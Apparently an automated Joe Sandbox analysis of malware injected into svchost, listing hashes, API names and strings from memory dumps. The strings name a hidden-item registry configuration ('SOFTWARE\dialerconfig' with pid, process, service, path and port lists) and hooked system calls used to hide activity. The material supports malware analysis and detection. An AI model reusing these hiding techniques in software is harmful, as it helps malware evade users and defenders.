                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: a1c3fc9fb2c424eb5cf16538e388777059fc8f0e0a0ae8e1d12dd053b8120eaf
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: D9F06271359F0481EB1ACB29FC4FB6A6321FB88BA2F540299DA6A461E4DF3CC4448354
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 6788c6199675c10edf7c539ab1b1bd7f0a961ca82cbb9ee56a1611471c4650f0
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: E1F08C2038DF8482EA49CF13BD1F619A260AB48FC2F0880B0EE6A07B18DF3CC4458708
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 3bab7aea2da97d2c89cf869e435822f7947a441c0eb5686131a233f6f073e29f
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 8702F67225DB8086EBA5CB59F89635AB7A0F3C4785F104055EA8E87BA8DF7CC484CF14
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 7c0b0c8c25f7da43d0dd52c625788ab6d70cb4887c3805681c3f7a601031dd5b
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: E261C77655DF40C6E76A8B1AF84A31AB7E0F388785F100155EA8E47BA8DB7CC444CF18
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 9bd224d7f8937e48dcb23c6a92691f7b715b7476c5eb2bebaeb9097fbf750117
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 3011A722FDCF5021F66E9568FC5FB6911406B783B6F180EA4A577876D6CA34CB41811C
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: a39f79cb811ea4c1becf5d789feaa45f4274d3385c809976c6f2e92f2461cad1
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: B911A7226DCF1119FA5E1529FC4F3693180EBD9376F4846B8A9660EFDACA78C8414228
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8e9c97b707987eaf443330098e57a4151393cd7d99a53dd1af56ba60a02a01f1
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 7561D63268CF4042F66FFB69FD4F3B966A1F782742F514495DA2A07795DB34C8428308
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 84adbe2866ac1e2fb66f4364389380746c042a873a352a778f6fc0d74beb4a81
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E961BD33608F88CAEB29DF65E88639D77A0F358B89F044255EF4A17B99DB38C084C714
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 83f5e9c311c848ec4fd2a0c7c7ec5783ac5279642614553dd1b91d6c427617f7
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 0E51D432148B80CAEB7AAF25B84B37877A0F354B86F1C8155FA8947BD5CB78D491C708
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                            • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                          • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                          • SleepEx.KERNEL32 ref: 000001F28C931ADD
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:

                                                                          Control-flow Graph (image not extracted; basic blocks 1f28c933844-1f28c933870, one call to StrCmpNIW)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 4292702814-0
                                                                          • Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                          • Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
                                                                          • Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                          • Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350

                                                                          Control-flow Graph

                                                                          (control-flow graph of the function at 1f28c1d6910 (CRT DllMain startup path: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c); graph data omitted)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001F28C93CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
